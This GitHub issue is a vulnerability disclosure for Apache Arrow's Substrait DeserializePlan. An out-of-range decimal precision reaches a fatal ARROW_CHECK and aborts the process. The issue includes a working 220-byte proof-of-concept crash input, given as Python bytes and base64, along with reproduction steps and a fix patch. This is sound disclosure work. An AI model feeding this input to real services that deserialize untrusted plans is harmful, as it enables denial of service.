Skip to content

Apache Arrow Substrait DeserializePlan fatal ARROW_CHECK abort on out-of-range decimal precision (Decimal128Type ctor via FromProtoImpl make_shared bypass) #50230

@OwenSanzas

Description

@OwenSanzas

Summary

A 220-byte Substrait Plan describing a decimal type with precision outside
[1, 38] (the PoC uses 42) fed to the public arrow::engine::DeserializePlan
API aborts the process. FromProtoImpl<Decimal128Type> constructs the type via
make_shared, bypassing the validating Decimal128Type::Make() factory, so the
constructor's ARROW_CHECK_OK(ValidateDecimalPrecision(...)) fires a fatal abort
instead of returning Status::Invalid. Any service that deserializes an
untrusted Substrait plan can be crashed (denial of service).

Tested at pinned commit 16fe34250a2ef261790b9cc414fdf0831669cf9f
(25.0.0-SNAPSHOT).

Root Cause

Arrow's Substrait type converter maps a substrait::Type::Decimal to an
arrow::Decimal128Type through the generic helper FromProtoImpl<Decimal128Type>,
which calls std::make_shared<Decimal128Type>(precision, scale) directly — i.e.
it invokes the constructor, not the validating factory Decimal128Type::Make().

Decimal128Type::Make() validates the precision and returns
Status::Invalid("Decimal precision out of range [1, 38]: ...") on bad input.
The constructor, by contrast, asserts: ARROW_CHECK_OK(ValidateDecimalPrecision(...))
is a fatal check that calls std::abort() (via ArrowLog / CerrLog::~CerrLog)
when validation fails. Because the Substrait decimal.precision() is an
attacker-controlled int32 taken straight from the protobuf, any value outside
[1, 38] aborts the process.

Vulnerable code — the bypass (cpp/src/arrow/engine/substrait/type_internal.cc:55-61, 171-175):

template <typename ArrowType, typename TypeMessage, typename... A>
Result<std::pair<std::shared_ptr<DataType>, bool>> FromProtoImpl(const TypeMessage& type,
                                                                 A&&... args) {
  return std::make_pair(std::static_pointer_cast<DataType>(
                            std::make_shared<ArrowType>(std::forward<A>(args)...)),
                        IsNullable(type));
}
...
    case substrait::Type::kDecimal: {
      const auto& decimal = type.decimal();
      return FromProtoImpl<Decimal128Type>(decimal, decimal.precision(), decimal.scale());
    }

Vulnerable code — the fatal check (cpp/src/arrow/type.cc:1520-1523):

Decimal128Type::Decimal128Type(int32_t precision, int32_t scale)
    : DecimalType(type_id, 16, precision, scale) {
  ARROW_CHECK_OK(ValidateDecimalPrecision<Decimal128Type>(precision));  // fatal abort
}

Decimal128Type::Make() (immediately below the constructor) is the non-fatal
path that returns Status::Invalid for the same condition; the Substrait
converter does not use it.

Call chain (DeserializePlan -> decimal field):

arrow::engine::DeserializePlan                      serde.cc:229   (public API)
  -> FromProto(Rel)                                 relation_internal.cc:400
  -> FromProto(NamedStruct)                         type_internal.cc:523
  -> FieldsFromProto                                type_internal.cc:93
  -> FromProto(Type)                                type_internal.cc:174
  -> FromProtoImpl<Decimal128Type>                  type_internal.cc:59   // make_shared, bypasses Make()
  -> Decimal128Type::Decimal128Type                 type.cc:1522          // ARROW_CHECK_OK -> abort

PoC

220 bytes — a Plan whose NamedStruct declares a decimal field with
precision = 42 (outside [1, 38]). The byte sequence c2 01 04 08 02 10 2a
encodes substrait.Type.decimal (field 24) with precision (field 2) = 0x2a
= 42.

# generate_poc.py — re-create the crash input from bytes
poc = (b'\x1a\xcc\x01\n\xc9\x01\n\xc6\x01\x12\xbe\x01\n\x02c0\n\x02c1\n\x02c2'
       b'\n\x02c3\n\x02c4\n\x02c5\n\x02c6\n\x02c7\n\x02c8\n\x02c9\n\x03c10'
       b'\n\x03c11\n\x03c12\n\x03c13\n\x03c14\n\x03c15\n\x03c16\n\x03c17'
       b'\x12l\n\x02\n\x00\n\x02\x12\x00\n\x02\x1a\x00\n\x02*\x00\n\x02:\x00'
       b'\n\x02R\x00\n\x02Z\x00\n\x02b\x00\n\x02j\x00\n\x02r\x00\n\x03\x82'
       b'\x01\x00\n\x03\x8a\x01\x00\n\x07\xc2\x01\x04\x08\x02\x10*\n\x05\xaa'
       b'\x01\x02\x08\x04\n\x05\xb2\x01\x02\x08\x08\n\x07\xda\x01\x04\n\x02:'
       b'\x00\n\x0b\xe2\x01\x08\n\x02b\x00\x12\x02:\x00\n\x0b\xca\x01\x08\n'
       b'\x02*\x00\n\x02b\x00:\x03\n\x01t2\x0b\x10,*\x07o2-seed')
open("poc.bin", "wb").write(poc)

Crash input size: 220 bytes (poc/poc.bin, md5 b2ae2aac5e277e07f5ea16901e088b4a).

Reproduction

Build Arrow C++ from source with -DARROW_SUBSTRAIT=ON and AddressSanitizer, then deserialize the
attached Substrait plan through the public API:

#include <arrow/engine/substrait/serde.h>
// auto buf = ...read poc.bin...;
auto result = arrow::engine::DeserializePlan(*buf);   // fatal ARROW_CHECK abort here

The decimal type converter FromProtoImpl<Decimal128Type> builds the type via
std::make_shared<Decimal128Type>(precision, scale), bypassing the validating Decimal128Type::Make()
factory; the ctor's ARROW_CHECK_OK(ValidateDecimalPrecision(...)) aborts on precision 42 (outside [1,38]):

type.cc: Check failed: _s.ok() ... Decimal precision out of range [1, 38]: 42

make_shared<...> bypass is still present in current master (cpp/src/arrow/engine/substrait/type_internal.cc:59).
PoC: 220 bytes (recreate from the base64 below).

Suggested Fix

Route the decimal conversion through the validating factory
Decimal128Type::Make() (which returns Status::Invalid on out-of-range
precision) instead of constructing via make_shared:

--- a/cpp/src/arrow/engine/substrait/type_internal.cc
+++ b/cpp/src/arrow/engine/substrait/type_internal.cc
@@
     case substrait::Type::kDecimal: {
       const auto& decimal = type.decimal();
-      return FromProtoImpl<Decimal128Type>(decimal, decimal.precision(), decimal.scale());
+      ARROW_ASSIGN_OR_RAISE(
+          auto dtype, Decimal128Type::Make(decimal.precision(), decimal.scale()));
+      return std::make_pair(std::move(dtype), IsNullable(decimal));
     }

This propagates a non-OK Status out of DeserializePlan on malformed precision
rather than aborting. Other FromProtoImpl<...> arms that wrap constructors with
fatal checks deserve the same audit, but only the decimal path is reproduced here.

PoC bytes (self-contained)

The trigger input is 220 bytes (poc/poc.bin).
Recreate it exactly with:

base64 -d > poc.bin <<'B64'
GswBCskBCsYBEr4BCgJjMAoCYzEKAmMyCgJjMwoCYzQKAmM1CgJjNgoCYzcKAmM4CgJjOQoDYzEwCgNjMTEKA2MxMgoDYzEzCgNj
MTQKA2MxNQoDYzE2CgNjMTcSbAoCCgAKAhIACgIaAAoCKgAKAjoACgJSAAoCWgAKAmIACgJqAAoCcgAKA4IBAAoDigEACgfCAQQI
AhAqCgWqAQIIBAoFsgECCAgKB9oBBAoCOgAKC+IBCAoCYgASAjoACgvKAQgKAioACgJiADoDCgF0MgsQLCoHbzItc2VlZA==
B64

Credit

Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions